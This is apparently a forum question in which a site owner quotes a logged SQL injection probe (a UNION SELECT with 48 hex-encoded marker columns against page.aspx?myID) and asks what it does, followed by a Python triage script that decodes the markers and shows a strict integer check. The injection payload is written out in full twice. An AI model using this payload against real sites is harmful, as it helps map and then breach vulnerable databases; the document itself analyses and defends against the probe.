My site has been hit repeatedly by this query, and I'm wondering what the attacker is trying to achieve. The URL is:
my.site/content/page.aspx?myID=15641111111111111%20UNION%20SELECT%20cAsT(0x2d78312d512d%20as%20char),/**/cAsT(0x2d78322d512d%20as%20char),/**/cAsT(0x2d78332d512d%20as%20char),/**/cAsT(0x2d78342d512d%20as%20char),/**/cAsT(0x2d78352d512d%20as%20char),/**/cAsT(0x2d78362d512d%20as%20char),/**/cAsT(0x2d78372d512d%20as%20char),/**/cAsT(0x2d78382d512d%20as%20char),/**/cAsT(0x2d78392d512d%20as%20char),/**/cAsT(0x2d7831302d512d%20as%20char),/**/cAsT(0x2d7831312d512d%20as%20char),/**/cAsT(0x2d7831322d512d%20as%20char),/**/cAsT(0x2d7831332d512d%20as%20char),/**/cAsT(0x2d7831342d512d%20as%20char),/**/cAsT(0x2d7831352d512d%20as%20char),/**/cAsT(0x2d7831362d512d%20as%20char),/**/cAsT(0x2d7831372d512d%20as%20char),/**/cAsT(0x2d7831382d512d%20as%20char),/**/cAsT(0x2d7831392d512d%20as%20char),/**/cAsT(0x2d7832302d512d%20as%20char),/**/cAsT(0x2d7832312d512d%20as%20char),/**/cAsT(0x2d7832322d512d%20as%20char),/**/cAsT(0x2d7832332d512d%20as%20char),/**/cAsT(0x2d7832342d512d%20as%20char),/**/cAsT(0x2d7832352d512d%20as%20char),/**/cAsT(0x2d7832362d512d%20as%20char),/**/cAsT(0x2d7832372d512d%20as%20char),/**/cAsT(0x2d7832382d512d%20as%20char),/**/cAsT(0x2d7832392d512d%20as%20char),/**/cAsT(0x2d7833302d512d%20as%20char),/**/cAsT(0x2d7833312d512d%20as%20char),/**/cAsT(0x2d7833322d512d%20as%20char),/**/cAsT(0x2d7833332d512d%20as%20char),/**/cAsT(0x2d7833342d512d%20as%20char),/**/cAsT(0x2d7833352d512d%20as%20char),/**/cAsT(0x2d7833362d512d%20as%20char),/**/cAsT(0x2d7833372d512d%20as%20char),/**/cAsT(0x2d7833382d512d%20as%20char),/**/cAsT(0x2d7833392d512d%20as%20char),/**/cAsT(0x2d7834302d512d%20as%20char),/**/cAsT(0x2d7834312d512d%20as%20char),/**/cAsT(0x2d7834322d512d%20as%20char),/**/cAsT(0x2d7834332d512d%20as%20char),/**/cAsT(0x2d7834342d512d%20as%20char),/**/cAsT(0x2d7834352d512d%20as%20char),/**/cAsT(0x2d7834362d512d%20as%20char),/**/cAsT(0x2d7834372d512d%20as%20char),/**/cAsT(0x2d7834382d512d%20as%20char)--
The first four digits in myID are a legitimate ID. After all of those, it is obviously a SQL injection attempt. Here is how it looks with the %20s replaced by spaces and some basic formatting:
UNION
SELECT
cAsT(0x2d78312d512d as char),/**/
cAsT(0x2d78322d512d as char),/**/
cAsT(0x2d78332d512d as char),/**/
cAsT(0x2d78342d512d as char),/**/
cAsT(0x2d78352d512d as char),/**/
cAsT(0x2d78362d512d as char),/**/
cAsT(0x2d78372d512d as char),/**/
cAsT(0x2d78382d512d as char),/**/
cAsT(0x2d78392d512d as char),/**/
cAsT(0x2d7831302d512d as char),/**/
cAsT(0x2d7831312d512d as char),/**/
cAsT(0x2d7831322d512d as char),/**/
cAsT(0x2d7831332d512d as char),/**/
cAsT(0x2d7831342d512d as char),/**/
cAsT(0x2d7831352d512d as char),/**/
cAsT(0x2d7831362d512d as char),/**/
cAsT(0x2d7831372d512d as char),/**/
cAsT(0x2d7831382d512d as char),/**/
cAsT(0x2d7831392d512d as char),/**/
cAsT(0x2d7832302d512d as char),/**/
cAsT(0x2d7832312d512d as char),/**/
cAsT(0x2d7832322d512d as char),/**/
cAsT(0x2d7832332d512d as char),/**/
cAsT(0x2d7832342d512d as char),/**/
cAsT(0x2d7832352d512d as char),/**/
cAsT(0x2d7832362d512d as char),/**/
cAsT(0x2d7832372d512d as char),/**/
cAsT(0x2d7832382d512d as char),/**/
cAsT(0x2d7832392d512d as char),/**/
cAsT(0x2d7833302d512d as char),/**/
cAsT(0x2d7833312d512d as char),/**/
cAsT(0x2d7833322d512d as char),/**/
cAsT(0x2d7833332d512d as char),/**/
cAsT(0x2d7833342d512d as char),/**/
cAsT(0x2d7833352d512d as char),/**/
cAsT(0x2d7833362d512d as char),/**/
cAsT(0x2d7833372d512d as char),/**/
cAsT(0x2d7833382d512d as char),/**/
cAsT(0x2d7833392d512d as char),/**/
cAsT(0x2d7834302d512d as char),/**/
cAsT(0x2d7834312d512d as char),/**/
cAsT(0x2d7834322d512d as char),/**/
cAsT(0x2d7834332d512d as char),/**/
cAsT(0x2d7834342d512d as char),/**/
cAsT(0x2d7834352d512d as char),/**/
cAsT(0x2d7834362d512d as char),/**/
cAsT(0x2d7834372d512d as char),/**/
cAsT(0x2d7834382d512d as char)--
When I run this query in SSMS, it returns this: all the way through -x48-Q-. Since this isn't actually querying any data, I can't think of what the attacker hopes to achieve. Has anyone ever seen anything like this before?
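An added example, not part of the question above: the triage an analyst would do on such a log line. Each hex literal in the URL decodes to a short marker string (0x2d78312d512d is "-x1-Q-", 0x2d7834382d512d is "-x48-Q-"), so the payload is a generic scanner supplying 48 numbered placeholder columns to a UNION SELECT and watching which marker, if any, shows up in the response. The code below decodes the markers, counts the columns and shows the strict integer check that page.aspx should apply to myID before it ever reaches SQL. The URL is a constructed excerpt of the one in the question (first four CAST terms plus the last one, with an assumed http:// scheme); the function names are mine.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed excerpt of the probe URL quoted in the question: the first four
# cAsT(...) terms and the last one, spelled exactly as in the original.
SAMPLE_URL = (
    "http://my.site/content/page.aspx?myID=15641111111111111%20UNION%20SELECT%20"
    "cAsT(0x2d78312d512d%20as%20char),/**/cAsT(0x2d78322d512d%20as%20char),/**/"
    "cAsT(0x2d78332d512d%20as%20char),/**/cAsT(0x2d78342d512d%20as%20char),/**/"
    "cAsT(0x2d7834382d512d%20as%20char)--"
)

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.IGNORECASE | re.DOTALL)
# A legitimate myID is a short run of digits and nothing else.
STRICT_ID = re.compile(r"^\d{1,9}$")


def decode_hex_literal(literal):
    """Turn a SQL hex literal such as 0x2d78312d512d into the text it encodes."""
    digits = HEX_LITERAL.fullmatch(literal).group(1)
    return bytes.fromhex(digits).decode("latin-1")


def extract_param(url, name="myID"):
    """Return the percent-decoded value of one query-string parameter."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[name][0]


def analyze_probe(value):
    """Describe a suspicious parameter value the way a log-triage script would.

    Returns the leading digits the application would have treated as the ID,
    whether a UNION ... SELECT is present, the decoded marker strings, and the
    number of columns the attacker is supplying to the UNION.
    """
    leading_digits = re.match(r"\d*", value).group(0)
    markers = [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(value)]
    return {
        "leading_digits": leading_digits,
        "union_select": bool(UNION_SELECT.search(value)),
        "markers": markers,
        "column_count": len(markers),
    }


def is_strict_id(value):
    """The input check page.aspx should apply before building any SQL.

    Rejecting everything but a short digit string (or, better, binding myID as an
    integer parameter) makes the whole payload fail before it reaches the database.
    """
    return STRICT_ID.fullmatch(value) is not None


if __name__ == "__main__":
    raw = extract_param(SAMPLE_URL)
    report = analyze_probe(raw)
    print("leading digits:", report["leading_digits"])
    print("UNION SELECT present:", report["union_select"])
    print("decoded markers:", report["markers"])
    print("columns supplied:", report["column_count"])
    print("accepted as myID:", is_strict_id(raw))
```

Run against the full URL from the question, the marker list runs from "-x1-Q-" to "-x48-Q-" and the column count is 48, which matches the result set the poster saw in SSMS: the probe is not reading data, it is measuring the query's shape. Because the real ID is only "1564" and the application evidently accepted the trailing 1s and the rest of the string, the fix is to reject anything that is not a plain integer and to pass it to the query as a bound parameter.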